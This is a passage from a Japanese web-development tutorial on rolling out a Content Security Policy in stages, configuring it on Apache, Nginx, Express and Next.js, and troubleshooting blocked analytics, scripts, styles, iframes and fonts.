lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;self&#39; &#39;unsafe-inline&#39; &#39;unsafe-eval&#39; https:;\n  img-src * data:;\n  report-uri https:\/\/example.com\/csp-report;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u3053\u306e\u6bb5\u968e\u3067\u306f\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\/\u30b9\u30bf\u30a4\u30eb\u3092\u8a31\u53ef<\/li>\n\n\n\n<li>eval()\u3092\u8a31\u53ef<\/li>\n\n\n\n<li>HTTPS\u306e\u30ea\u30bd\u30fc\u30b9\u3092\u5168\u8a31\u53ef<\/li>\n\n\n\n<li>\u5f15\u304d\u7d9a\u304d\u30ec\u30dd\u30fc\u30c8\u6a5f\u80fd\u3067\u76e3\u8996<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">\u30d5\u30a7\u30fc\u30ba3: \u30dd\u30ea\u30b7\u30fc\u306e\u6bb5\u968e\u7684\u306a\u53b3\u683c\u5316<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b89\u5b9a\u7a3c\u50cd\u3092\u78ba\u8a8d\u3057\u305f\u3089\u3001\u5f90\u3005\u306b\u30dd\u30ea\u30b7\u30fc\u3092\u53b3\u683c\u5316\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30b9\u30c6\u30c3\u30d71: HTTPS\u3092\u5fc5\u9808\u306b<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>default-src &#39;self&#39; &#39;unsafe-inline&#39; &#39;unsafe-eval&#39;; \/* https: \u3092\u524a\u9664 *\/<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30b9\u30c6\u30c3\u30d72: eval()\u3092\u7981\u6b62<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>default-src &#39;self&#39; &#39;unsafe-inline&#39;; \/* &#39;unsafe-eval&#39; \u3092\u524a\u9664 *\/<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30b9\u30c6\u30c3\u30d73: \u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u7981\u6b62\uff08nonce\u307e\u305f\u306fhash\u3092\u4f7f\u7528\uff09<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>default-src &#39;self&#39;;\nscript-src &#39;self&#39; &#39;nonce-{random}&#39;;\nstyle-src &#39;self&#39; &#39;nonce-{random}&#39;;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5404\u30b9\u30c6\u30c3\u30d7\u30671-2\u9031\u9593\u904b\u7528\u3057\u3001\u554f\u984c\u304c\u306a\u3044\u3053\u3068\u3092\u78ba\u8a8d\u3057\u3066\u304b\u3089\u6b21\u306b\u9032\u307f\u307e\u3059\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u30d5\u30a7\u30fc\u30ba4: \u6700\u7d42\u7684\u306a\u53b3\u683c\u306a\u30dd\u30ea\u30b7\u30fc<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7d42\u7684\u306b\u3001\u5fc5\u8981\u6700\u5c0f\u9650\u306e\u8a31\u53ef\u306e\u307f\u3092\u542b\u3080\u30dd\u30ea\u30b7\u30fc\u3092\u9069\u7528\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;self&#39;;\n  script-src &#39;self&#39; &#39;nonce-{random}&#39; https:\/\/cdn.example.com;\n  style-src &#39;self&#39; &#39;nonce-{random}&#39;;\n  img-src &#39;self&#39; data: https:;\n  font-src &#39;self&#39; https:\/\/fonts.gstatic.com;\n  connect-src &#39;self&#39; https:\/\/api.example.com;\n  frame-src &#39;none&#39;;\n  object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;\n  upgrade-insecure-requests;\n  block-all-mixed-content;<\/code><\/pre><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e3b\u8981\u306aWeb\u30b5\u30fc\u30d0\u30fc\u3067\u306eCSP\u8a2d\u5b9a\u65b9\u6cd5<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668-1.jpg\" alt=\"\" class=\"wp-image-13263\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668-1.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668-1-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.12.07.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u6b21\u306f\u3001\u30b5\u30fc\u30d0\u30fc\u74b0\u5883\u5225\u306eCSP\u8a2d\u5b9a\u65b9\u6cd5\u3092\u7d39\u4ecb\u3059\u308b\u304b\u3089\u3088\u30fc\u304f\u805e\u304f\u3093\u3058\u3083\u305e\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.48.08.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u5206\u304b\u308a\u307e\u3057\u305f\uff01\u3088\u308d\u3057\u304f\u304a\u9858\u3044\u3057\u307e\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">Apache (.htaccess)<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>&lt;IfModule mod_headers.c&gt;\n  Header set Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39; https:\/\/cdn.example.com; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39; https:\/\/fonts.gstatic.com; connect-src &#39;self&#39;; frame-src &#39;none&#39;; object-src &#39;none&#39;; base-uri &#39;self&#39;; form-action &#39;self&#39;; upgrade-insecure-requests;&quot;\n&lt;\/IfModule&gt;<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Nginx<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>server {\n  # \u305d\u306e\u4ed6\u306e\u8a2d\u5b9a...\n\n  add_header Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39; https:\/\/cdn.example.com; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39; https:\/\/fonts.gstatic.com; connect-src &#39;self&#39;; frame-src &#39;none&#39;; object-src &#39;none&#39;; base-uri &#39;self&#39;; form-action &#39;self&#39;; upgrade-insecure-requests;&quot; always;\n}<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Node.js \/ Express<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-js\" data-lang=\"JavaScript\"><code>const express = require(&#39;express&#39;);\nconst helmet = require(&#39;helmet&#39;);\n\nconst app = express();\n\n\/\/ helmet\u3092\u4f7f\u7528\u3057\u305f\u8a2d\u5b9a\uff08\u63a8\u5968\uff09\napp.use(\n  helmet.contentSecurityPolicy({\n    directives: {\n      defaultSrc: [&quot;&#39;self&#39;&quot;],\n      scriptSrc: [&quot;&#39;self&#39;&quot;, &quot;https:\/\/cdn.example.com&quot;],\n      styleSrc: [&quot;&#39;self&#39;&quot;, &quot;&#39;unsafe-inline&#39;&quot;],\n      imgSrc: [&quot;&#39;self&#39;&quot;, &quot;data:&quot;, &quot;https:&quot;],\n      fontSrc: [&quot;&#39;self&#39;&quot;, &quot;https:\/\/fonts.gstatic.com&quot;],\n      connectSrc: [&quot;&#39;self&#39;&quot;],\n      frameSrc: [&quot;&#39;none&#39;&quot;],\n      objectSrc: [&quot;&#39;none&#39;&quot;],\n      baseUri: [&quot;&#39;self&#39;&quot;],\n      formAction: [&quot;&#39;self&#39;&quot;],\n      upgradeInsecureRequests: [],\n    },\n  })\n);\n\n\/\/ \u624b\u52d5\u8a2d\u5b9a\u306e\u5834\u5408\napp.use((req, res, next) =&gt; {\n  res.setHeader(\n    &#39;Content-Security-Policy&#39;,\n    &quot;default-src &#39;self&#39;; script-src &#39;self&#39; https:\/\/cdn.example.com; ...&quot;\n  );\n  next();\n});<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Next.js<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-js\" data-lang=\"JavaScript\"><code>\/\/ next.config.js\nmodule.exports = {\n  async headers() {\n    return [\n      {\n        source: &#39;\/:path*&#39;,\n        headers: [\n          {\n            key: &#39;Content-Security-Policy&#39;,\n            value: &quot;default-src &#39;self&#39;; script-src &#39;self&#39; &#39;unsafe-eval&#39; &#39;unsafe-inline&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;; img-src &#39;self&#39; data: https:; font-src &#39;self&#39;; connect-src &#39;self&#39;; frame-src &#39;none&#39;; object-src &#39;none&#39;;&quot;\n          }\n        ]\n      }\n    ]\n  }\n}<\/code><\/pre><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>\u30c8\u30e9\u30d6\u30eb\u30b7\u30e5\u30fc\u30c6\u30a3\u30f3\u30b0<\/strong><\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006669.jpg\" alt=\"\" class=\"wp-image-13264\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006669.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006669-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.00.55.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>CSP\u3092\u5b9f\u88c5\u3059\u308b\u306b\u3042\u305f\u3063\u3066\u30c8\u30e9\u30d6\u30eb\u30b7\u30e5\u30fc\u30c6\u30a3\u30f3\u30b0\u306e\u3053\u3068\u3082\u77e5\u308a\u305f\u3044\u3067\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.12.07.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong><strong><strong>\u3046\u3080\u3002\u3053\u3053\u3067\u306f\u3001\u4e3b\u306a\u30c8\u30e9\u30d6\u30eb\u30b7\u30e5\u30fc\u30c6\u30a3\u30f3\u30b0\u30925\u3064\u7d39\u4ecb\u3059\u308b\u305e\u3044\uff01<\/strong><\/strong><\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u554f\u984c1: Google Analytics\u3084Google Tag Manager\u304c\u52d5\u304b\u306a\u3044<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u75c7\u72b6\uff1a<\/strong>CSP\u5c0e\u5165\u5f8c\u3001\u30a2\u30af\u30bb\u30b9\u89e3\u6790\u304c\u53d6\u5f97\u3067\u304d\u306a\u304f\u306a\u3063\u305f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u539f\u56e0\uff1a<\/strong>Google\u95a2\u9023\u306e\u30c9\u30e1\u30a4\u30f3\u304c\u8a31\u53ef\u3055\u308c\u3066\u3044\u306a\u3044\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u89e3\u6c7a\u7b56\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  script-src &#39;self&#39; https:\/\/www.googletagmanager.com https:\/\/\nwww.google-analytics.com;\n  img-src &#39;self&#39; https:\/\/www.google-analytics.com https:\/\/\nwww.googletagmanager.com;\n  connect-src &#39;self&#39; https:\/\/www.google-analytics.com https:\/\/\nanalytics.google.com;<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u554f\u984c2: \u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u30d6\u30ed\u30c3\u30af\u3055\u308c\u308b<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u75c7\u72b6\uff1a<\/strong><code>&lt;script&gt;<\/code>\u30bf\u30b0\u5185\u306eJavaScript\u304c\u5b9f\u884c\u3055\u308c\u306a\u3044\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u539f\u56e0\uff1a<\/strong>&#8216;unsafe-inline&#8217;\u304c\u8a2d\u5b9a\u3055\u308c\u3066\u3044\u306a\u3044\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u89e3\u6c7a\u7b56\uff08\u9078\u629e\u80a2\uff09\uff1a<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u65b9\u6cd51: nonce\u3092\u4f7f\u7528\uff08\u63a8\u5968\uff09<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>&lt;!-- \u30b5\u30fc\u30d0\u30fc\u5074\u3067\u30e9\u30f3\u30c0\u30e0\u306anonce\u3092\u751f\u6210 --&gt;\n&lt;script nonce=&quot;abc123&quot;&gt;\n  console.log(&#39;\u8a31\u53ef\u3055\u308c\u305f\u30b9\u30af\u30ea\u30d7\u30c8&#39;);\n&lt;\/script&gt;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u65b9\u6cd52: \u5916\u90e8\u30d5\u30a1\u30a4\u30eb\u5316<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>&lt;!-- \u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5916\u90e8\u30d5\u30a1\u30a4\u30eb\u306b\u79fb\u52d5 --&gt;\n&lt;script src=&quot;\/js\/app.js&quot;&gt;&lt;\/script&gt;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u65b9\u6cd53: &#8216;unsafe-inline&#8217;\u3092\u8a31\u53ef\uff08\u975e\u63a8\u5968\uff09<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>script-src &#39;self&#39; &#39;unsafe-inline&#39;;<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u554f\u984c3: CSS\u304c\u9069\u7528\u3055\u308c\u306a\u3044<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u75c7\u72b6\uff1a<\/strong>\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30bf\u30a4\u30eb\u3084style\u5c5e\u6027\u304c\u7121\u52b9\u5316\u3055\u308c\u308b\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u89e3\u6c7a\u7b56\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>style-src &#39;self&#39; &#39;unsafe-inline&#39;;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u307e\u305f\u306f\u3001nonce\u3092\u4f7f\u7528\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-css\" data-lang=\"CSS\"><code>&lt;style nonce=&quot;abc123&quot;&gt;\n  .custom { color: red; }\n&lt;\/style&gt;<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u554f\u984c4: iframe\u304c\u8868\u793a\u3055\u308c\u306a\u3044<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u75c7\u72b6\uff1a<\/strong>YouTube\u306e\u57cb\u3081\u8fbc\u307f\u52d5\u753b\u306a\u3069\u304c\u8868\u793a\u3055\u308c\u306a\u3044\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u89e3\u6c7a\u7b56\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>frame-src &#39;self&#39; https:\/\/www.youtube.com https:\/\/player.vimeo.com;<\/code><\/pre><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u554f\u984c5: Font Awesome\u3084Google Fonts\u304c\u8aad\u307f\u8fbc\u307e\u308c\u306a\u3044<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u89e3\u6c7a\u7b56\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>font-src &#39;self&#39; https:\/\/fonts.gstatic.com \nhttps:\/\/cdnjs.cloudflare.com;\nstyle-src &#39;self&#39; https:\/\/fonts.googleapis.com \nhttps:\/\/cdnjs.cloudflare.com;<\/code><\/pre><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">CSP\u306e\u30c6\u30b9\u30c8\u3068\u30c7\u30d0\u30c3\u30b0<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006670.jpg\" alt=\"\" class=\"wp-image-13265\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006670.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006670-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n\n<h3 class=\"wp-block-heading\">Chrome DevTools\u3067\u306e\u78ba\u8a8d\u65b9\u6cd5<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">CSP\u9055\u53cd\u306fChrome\u306eConsole\u30bf\u30d6\u306b\u8868\u793a\u3055\u308c\u307e\u3059\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u9055\u53cd\u30e1\u30c3\u30bb\u30fc\u30b8\u306e\u4f8b\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Refused to load the script &#39;https:\/\/evil.com\/malicious.js&#39; because it violates the following Content Security Policy directive: &quot;script-src &#39;self&#39;&quot;.<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u78ba\u8a8d\u624b\u9806\uff1a<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Chrome DevTools\u3092\u958b\u304f\uff08F12\u30ad\u30fc\uff09<\/li>\n\n\n\n<li>Console\u30bf\u30d6\u3092\u9078\u629e<\/li>\n\n\n\n<li>\u30da\u30fc\u30b8\u3092\u30ea\u30ed\u30fc\u30c9<\/li>\n\n\n\n<li>CSP\u9055\u53cd\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u78ba\u8a8d<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">\u30aa\u30f3\u30e9\u30a4\u30f3\u30c4\u30fc\u30eb<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>1. CSP Evaluator (Google)<\/strong><br><a href=\"https:\/\/csp-evaluator.withgoogle.com\/\">https:\/\/csp-evaluator.withgoogle.com\/<\/a><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CSP\u30dd\u30ea\u30b7\u30fc\u306e\u5b89\u5168\u6027\u3092\u8a55\u4fa1<\/li>\n\n\n\n<li>\u8106\u5f31\u6027\u3092\u6307\u6458<\/li>\n\n\n\n<li>\u6539\u5584\u6848\u3092\u63d0\u793a<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>2. Report URI<\/strong><br><a href=\"https:\/\/report-uri.com\/\">https:\/\/report-uri.com\/<\/a><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CSP\u9055\u53cd\u30ec\u30dd\u30fc\u30c8\u306e\u53ce\u96c6\u30fb\u5206\u6790\u30b5\u30fc\u30d3\u30b9<\/li>\n\n\n\n<li>\u30c0\u30c3\u30b7\u30e5\u30dc\u30fc\u30c9\u3067\u9055\u53cd\u50be\u5411\u3092\u53ef\u8996\u5316<\/li>\n\n\n\n<li>\u7121\u6599\u30d7\u30e9\u30f3\u3042\u308a<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>3. Security Headers<\/strong><br><a href=\"https:\/\/securityheaders.com\/\">https:\/\/securityheaders.com\/<\/a><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Web\u30b5\u30a4\u30c8\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30d8\u30c3\u30c0\u30fc\u3092\u8a55\u4fa1<\/li>\n\n\n\n<li>CSP\u3092\u542b\u3080\u5404\u7a2e\u30d8\u30c3\u30c0\u30fc\u3092\u30c1\u30a7\u30c3\u30af<\/li>\n\n\n\n<li>\u6539\u5584\u70b9\u3092\u63d0\u6848<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.48.08.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>CSP\u3001\u601d\u3063\u3066\u305f\u3088\u308a\u3061\u3083\u3093\u3068\u8a2d\u8a08\u3059\u308b\u3082\u306e\u306a\u3093\u3067\u3059\u306d\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.12.07.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u3046\u3080\u3002CSP\u3092\u7406\u89e3\u3067\u304d\u308c\u3070\u3001<br>\u5b89\u5168\u306aWeb\u30b5\u30a4\u30c8\u3092\u8a2d\u8a08\u3067\u304d\u308b\u30a8\u30f3\u30b8\u30cb\u30a2\u306b\u4e00\u6b69\u8fd1\u3065\u304f\u305e\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.06.05.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u307e\u305a\u306fReport-Only\u304b\u3089\u8a66\u3057\u3066\u307f\u307e\u3059\uff01\u3042\u308a\u304c\u3068\u3046\u3054\u3056\u3044\u307e\u3057\u305f\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h2 class=\"wp-block-heading\">\u307e\u3068\u3081<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u672c\u8a18\u4e8b\u3067\u306f\u3001Content Security Policy (CSP)\u306e\u5b9f\u88c5\u65b9\u6cd5\u306b\u3064\u3044\u3066\u3001\u57fa\u790e\u304b\u3089\u5b9f\u8df5\u307e\u3067\u8a73\u3057\u304f\u89e3\u8aac\u3057\u307e\u3057\u305f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u91cd\u8981\u306a\u30dd\u30a4\u30f3\u30c8\u306f\u4ee5\u4e0b\u306e\u901a\u308a\u3067\u3059\u3002<\/p>\n\n\n\n<p class=\"is-style-big_icon_point wp-block-paragraph\"><strong>\u30fbCSP\u306e\u5f79\u5272<\/strong>\uff1aXSS\u653b\u6483\u3084\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u653b\u6483\u304b\u3089Web\u30b5\u30a4\u30c8\u3092\u4fdd\u8b77\u3059\u308b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u6a5f\u80fd<br><strong>\u30fb\u30db\u30ef\u30a4\u30c8\u30ea\u30b9\u30c8\u65b9\u5f0f<\/strong>\uff1a\u8a31\u53ef\u3059\u308b\u30ea\u30bd\u30fc\u30b9\u306e\u53d6\u5f97\u5143\u3092\u660e\u793a\u7684\u306b\u6307\u5b9a<br>\u30fb<strong>\u4e3b\u8981\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6<\/strong>\uff1adefault-src\u3001script-src\u3001style-src\u3001img-src\u306a\u3069\u3067\u7d30\u304b\u304f\u5236\u5fa1<br>\u30fb<strong>\u5b9f\u8df5\u7684\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8<\/strong>\uff1a\u7528\u9014\u5225\uff08\u9759\u7684\u30b5\u30a4\u30c8\u3001CDN\u4f7f\u7528\u3001SPA\u3001nonce\uff09\u306e\u8a2d\u5b9a\u4f8b\u309